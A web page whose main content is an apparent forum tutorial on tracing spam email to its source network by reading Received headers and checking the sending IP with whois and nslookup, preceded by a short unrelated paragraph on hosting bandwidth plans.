Most personal or small business sites will not need more than 1GB of bandwidth per month. If you have a web site that is composed of static web pages and you expect little traffic to your site on a daily basis, go with a low bandwidth plan. If you go over the amount of bandwidth allocated in your plan, your hosting company could charge you over usage fees, so if you think the traffic to your site will be significant, you may want to go through the calculations above to estimate the amount of bandwidth required in a hosting plan.

Backtracking EMAIL Messages

Backtracking EMAIL Messages
Tracking email back to its source: Twisted Evilcause i hate spammers... Evil or Very Mad
Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.
So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .
If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.
Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.
Return-Path: <s359dyxtt@yahoo.com>
X-Original-To: davar@example.com
Delivered-To: davar@example.com
Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)
Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200
Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>
From: "Maricela Paulson" <s359dyxtt@yahoo.com>
Reply-To: "Maricela Paulson" <s359dyxtt@yahoo.com>
To: davar@example.com
Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha
Date: Sun, 16 Nov 2003 19:42:31 +0200
X-Mailer: Internet Mail Service (5.5.2650.21)
X-Priority: 3
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.
The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.
The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.
Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.
davar@nqh9k:[/home/davar] $whois 12.218.172.108
AT&T WorldNet Services ATT (NET-12-0-0-0-1)12.0.0.0 - 12.255.255.255Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)12.218.168.0 - 12.218.175.255
# ARIN WHOIS database, last updated 2003-12-31 19:15# Enter ? for additional hints on searching ARIN's WHOIS database.
I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.
davar@nqh9k:[/home/davar] $nslookup 12.218.172.108
Server: localhostAddress: 127.0.0.1
Name: 12-218-172-108.client.mchsi.comAddress: 12.218.172.108
Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.
There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.
A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.
But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.